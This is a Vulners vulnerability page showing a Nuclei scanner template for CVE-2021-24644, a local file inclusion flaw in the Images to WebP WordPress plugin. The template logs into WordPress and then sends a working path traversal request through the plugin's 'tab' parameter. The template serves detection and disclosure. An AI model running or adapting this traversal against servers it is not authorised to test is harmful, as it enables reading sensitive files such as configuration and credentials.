Lucene search
K

Images to WebP < 1.9 - Authenticated Local File Inclusion

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Authenticated Local File Inclusion in Images to WebP below 1.9 via the tab parameter in include().

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24644
11 Sep 202513:37
circl
CNNVD
WordPress 路径遍历漏洞
23 Nov 202100:00
cnnvd
CVE
CVE-2021-24644
23 Nov 202119:16
cve
Cvelist
CVE-2021-24644 Images to WebP < 1.9 - Authenticated Local File Inclusion
23 Nov 202119:16
cvelist
EUVD
EUVD-2021-11556
23 Nov 202119:16
euvd
NVD
CVE-2021-24644
23 Nov 202120:15
nvd
OSV
CVE-2021-24644
23 Nov 202120:15
osv
Patchstack
WordPress Images to WebP plugin <= 1.8 - Authenticated Local File Inclusion (LFI) vulnerability
19 Oct 202100:00
patchstack
Prion
Design/Logic Flaw
23 Nov 202120:15
prion
Positive Technologies
PT-2021-16161
23 Nov 202100:00
ptsecurity
Rows per page
id: CVE-2021-24644

info:
  name: Images to WebP < 1.9 - Authenticated Local File Inclusion
  author: Sourabh-Sahu
  severity: high
  description: |
    The Images to WebP WordPress plugin before version 1.9 did not validate or sanitize the tab parameter before using it in the include() function.
  impact: |
    Authenticated attackers can read arbitrary local files from the server via path traversal, potentially exposing sensitive configuration files, credentials, and system information.
  remediation: Fixed in 1.9
  reference:
    - https://wpscan.com/vulnerability/5a363eeb-9510-4535-97e2-9dfd3b10d511/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24644
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24644
    cwe-id: CWE-22
    epss-score: 0.05028
    epss-percentile: 0.91227
    cpe: cpe:2.3:a:imagestowebp_project:images_to_webp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: imagestowebp_project
    product: images_to_webp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/images-to-webp/"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/upload.php?page=images-to-webp.php&tab=..%2F..%2F..%2F..%2Fwp-links-opml HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "wp-links-opml", "Images to WebP")
          - regex('[A-Za-z]{3}, [0-9]{2} [A-Za-z]{3} 20[0-9]{2}', body)
        condition: and
# digest: 4a0a0047304502206eae9eecfe8b6f7845398636ae4973c9175e55a4a05d02ccd935b13a9118a278022100f143bee1f5b0aa3c07a42dcaf2ef24a1f58b425ccc9037e9933dd88dd4fd7ad3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.05028
14